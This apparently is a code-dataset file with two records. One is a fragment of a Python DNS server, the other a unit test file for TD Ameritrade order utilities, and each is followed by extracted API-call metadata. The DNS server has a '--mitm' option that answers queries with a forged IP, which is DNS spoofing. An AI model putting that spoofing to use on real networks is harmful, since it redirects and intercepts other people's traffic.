ns, hostmasta, serialNo, refresh, retry, expire, minTTL = data.split(' ')
if not ns.endswith('.'):
ns += '.'
if not hostmasta.endswith('.'):
hostmasta += '.'
print('r: {}, type: {}, class {}, mname {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl), ns))
soa = txt2domainname(ns) + txt2domainname(hostmasta) + struct.pack('!IIIII', *map(int, [serialNo, refresh, retry, expire, minTTL]))
return txt2domainname(dn) + struct.pack('!HHIH', type, cl, ttl, len(soa)) + soa
raise Exception('cant create response for that')
def resolve_zones(query, rr):
dn, type, klass = query
normal = []
authoritative = []
for r in rr:
a = (dn, r.rdtype, r.rdclass, rr.ttl, str(r).replace('\\@', '.'))
if r.rdtype == 6:
authoritative.append(a)
else:
normal.append(a)
return (0, normal, authoritative)
def dns_response(request):
answer = b''
nswer = b''
flags = 0
ancount = 0
nscount = 0
status = 3 # default status not found
for q in request.queries:
(dn, type, cl) = q
print('q: {}, type: {}, class {}'.format(dn, dns.rdatatype.to_text(type), dns.rdataclass.to_text(cl)))
rr = None
for zone in config.zones:
try:
rr = zone.find_rdataset(dn, type)
break
except: pass
if rr is not None and args.mitm is None:
flags |= 1 << 10 # set authoritative
status, normal, authoritative = resolve_zones(q, rr)
else:
status, normal, authoritative = resolve_remote(q) if args.mitm is None or type in [6] else resolve_fake(q, str(args.mitm[0]))
for r in normal:
ancount += 1
answer += build_answer_data(r)
for r in authoritative:
nscount += 1
nswer += build_answer_data(r)
flags |= 1 << 15 # set QR to (1) - Response
flags |= 1 << 7 #
flags |= 1 << 8 #
flags |= status
id = struct.pack('!H', request.id)
flags = struct.pack('!H', flags)
qdcount = struct.pack('!H', 0)
ancount = struct.pack('!H', ancount)
nscount = struct.pack('!H', nscount)
arcount = struct.pack('!H', 0)
return id + flags + qdcount + ancount + nscount + arcount + \
answer + nswer
def parse_dns_record(rawdata, offset):
dn, offset = get_domainname(rawdata, offset)
dn = pdomainname(dn)
query_type, query_class = struct.unpack_from('!HH', rawdata, offset=offset)
offset += 10
query = dn, query_type, query_class
return (offset, query)
| [
"struct.unpack",
"struct.unpack_from",
"struct.pack",
"uuid.uuid4"
] | [((263, 275), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (273, 275), False, 'import uuid\n'), ((6808, 6837), 'struct.pack', 'struct.pack', (['"""!H"""', 'request.id'], {}), "('!H', request.id)\n", (6819, 6837), False, 'import struct\n'), ((6850, 6874), 'struct.pack', 'struct.pack', (['"""!H"""', 'flags'], {}), "('!H', flags)\n", (6861, 6874), False, 'import struct\n'), ((6889, 6909), 'struct.pack', 'struct.pack', (['"""!H"""', '(0)'], {}), "('!H', 0)\n", (6900, 6909), False, 'import struct\n'), ((6924, 6950), 'struct.pack', 'struct.pack', (['"""!H"""', 'ancount'], {}), "('!H', ancount)\n", (6935, 6950), False, 'import struct\n'), ((6965, 6991), 'struct.pack', 'struct.pack', (['"""!H"""', 'nscount'], {}), "('!H', nscount)\n", (6976, 6991), False, 'import struct\n'), ((7006, 7026), 'struct.pack', 'struct.pack', (['"""!H"""', '(0)'], {}), "('!H', 0)\n", (7017, 7026), False, 'import struct\n'), ((7261, 7310), 'struct.unpack_from', 'struct.unpack_from', (['"""!HH"""', 'rawdata'], {'offset': 'offset'}), "('!HH', rawdata, offset=offset)\n", (7279, 7310), False, 'import struct\n'), ((1075, 1117), 'struct.unpack', 'struct.unpack', (['"""B"""', 'pkt[offset:offset + 1]'], {}), "('B', pkt[offset:offset + 1])\n", (1088, 1117), False, 'import struct\n'), ((1255, 1298), 'struct.unpack', 'struct.unpack', (['"""!H"""', 'pkt[offset:offset + 2]'], {}), "('!H', pkt[offset:offset + 2])\n", (1268, 1298), False, 'import struct\n'), ((721, 745), 'struct.pack', 'struct.pack', (['"""B"""', 'length'], {}), "('B', length)\n", (732, 745), False, 'import struct\n'), ((4112, 4150), 'struct.pack', 'struct.pack', (['"""!HHIH"""', 'type', 'cl', 'ttl', '(4)'], {}), "('!HHIH', type, cl, ttl, 4)\n", (4123, 4150), False, 'import struct\n')] |
from unittest.mock import MagicMock
import datetime
import json
import unittest
from tda.orders import EquityOrderBuilder
from tda.utils import Utils
from . import test_utils
class MockResponse:
def __init__(self, json, ok, headers=None):
self._json = json
self.ok = ok
self.headers = headers if headers is not None else {}
def json(self):
return self._json
class UtilsTest(unittest.TestCase):
def setUp(self):
self.mock_client = MagicMock()
self.account_id = 10000
self.utils = Utils(self.mock_client, self.account_id)
self.order_id = 1
self.maxDiff = None
##########################################################################
# extract_order_id tests
def test_extract_order_id_order_not_ok(self):
response = MockResponse({}, False)
with self.assertRaises(ValueError, msg='order not successful'):
self.utils.extract_order_id(response)
def test_extract_order_id_no_location(self):
response = MockResponse({}, True, headers={})
self.assertIsNone(self.utils.extract_order_id(response))
def test_extract_order_id_no_pattern_match(self):
response = MockResponse({}, True, headers={
'Location': 'https://api.tdameritrade.com/v1/accounts/12345'})
self.assertIsNone(self.utils.extract_order_id(response))
def test_get_order_nonmatching_account_id(self):
response = MockResponse({}, True, headers={
'Location':
'https://api.tdameritrade.com/v1/accounts/{}/orders/456'.format(
self.account_id + 1)})
with self.assertRaises(
ValueError, msg='order request account ID != Utils.account_id'):
self.utils.extract_order_id(response)
def test_get_order_success(self):
order_id = self.account_id + 100
response = MockResponse({}, True, headers={
'Location':
'https://api.tdameritrade.com/v1/accounts/{}/orders/{}'.format(
self.account_id, order_id)})
self.assertEqual(order_id, self.utils.extract_order_id(response))
##########################################################################
# find_most_recent_order tests
def order(self, time, symbol, quantity, instruction, order_type):
order = test_utils.real_order()
order['orderId'] = self.order_id
order['enteredTime'] = time
order['closeTime'] = time
order['accountId'] = self.account_id
order['orderType'] = order_type
order['orderLegCollection'][0]['quantity'] = quantity
order['orderLegCollection'][0]['instruction'] = instruction
order['orderLegCollection'][0]['instrument']['symbol'] = symbol
order['orderActivityCollection'][0]['executionLegs'][0]['time'] = time
order['orderActivityCollection'][0]['quantity'] = quantity
order['orderActivityCollection'][0]['executionLegs'][0]['quantity'] \
= quantity
self.order_id += 1
return order
def test_most_recent_order(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
order = self.utils.find_most_recent_order()
self.assertEqual(order2, order)
def test_too_many_order_legs(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order()
self.assertEqual(order2, out_order)
order2['orderLegCollection'].append(order2['orderLegCollection'][0])
out_order = self.utils.find_most_recent_order()
self.assertEqual(order1, out_order)
def test_non_equity_asset_type(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order()
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instrument']['assetType'] = 'OPTION'
out_order = self.utils.find_most_recent_order()
self.assertEqual(order1, out_order)
def test_different_symbol(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(symbol='AAPL')
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instrument']['symbol'] = 'MSFT'
out_order = self.utils.find_most_recent_order(symbol='AAPL')
self.assertEqual(order1, out_order)
def test_quantity_and_symbol(self):
msg = 'when specifying quantity, must also specify symbol'
with self.assertRaises(ValueError, msg=msg):
out_order = self.utils.find_most_recent_order(quantity=1)
def test_different_quantity(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
symbol='AAPL', quantity=1)
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['quantity'] = 10
out_order = self.utils.find_most_recent_order(
symbol='AAPL', quantity=1)
self.assertEqual(order1, out_order)
def test_different_instruction(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
instruction=EquityOrderBuilder.Instruction.BUY)
self.assertEqual(order2, out_order)
order2['orderLegCollection'][0]['instruction'] = 'SELL'
out_order = self.utils.find_most_recent_order(
instruction=EquityOrderBuilder.Instruction.BUY)
self.assertEqual(order1, out_order)
def test_different_order_type(self):
order1 = self.order(
'2020-01-01T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
order2 = self.order(
'2020-01-02T12:00:00+0000', 'AAPL', 1, 'BUY', 'MARKET')
self.mock_client.get_orders_by_path = MagicMock(
return_value=MockResponse([order1, order2], True))
out_order = self.utils.find_most_recent_order(
order_type=EquityOrderBuilder.OrderType.MARKET)
self.assertEqual(order2, out_order)
order2['orderType'] = 'LIMIT'
out_order = self.utils.find_most_recent_order(
order_type=EquityOrderBuilder.OrderType.MARKET)
self.assertEqual(order1, out_order)
| [
"tda.utils.Utils",
"unittest.mock.MagicMock"
] | [((490, 501), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (499, 501), False, 'from unittest.mock import MagicMock\n'), ((555, 595), 'tda.utils.Utils', 'Utils', (['self.mock_client', 'self.account_id'], {}), '(self.mock_client, self.account_id)\n', (560, 595), False, 'from tda.utils import Utils\n')] |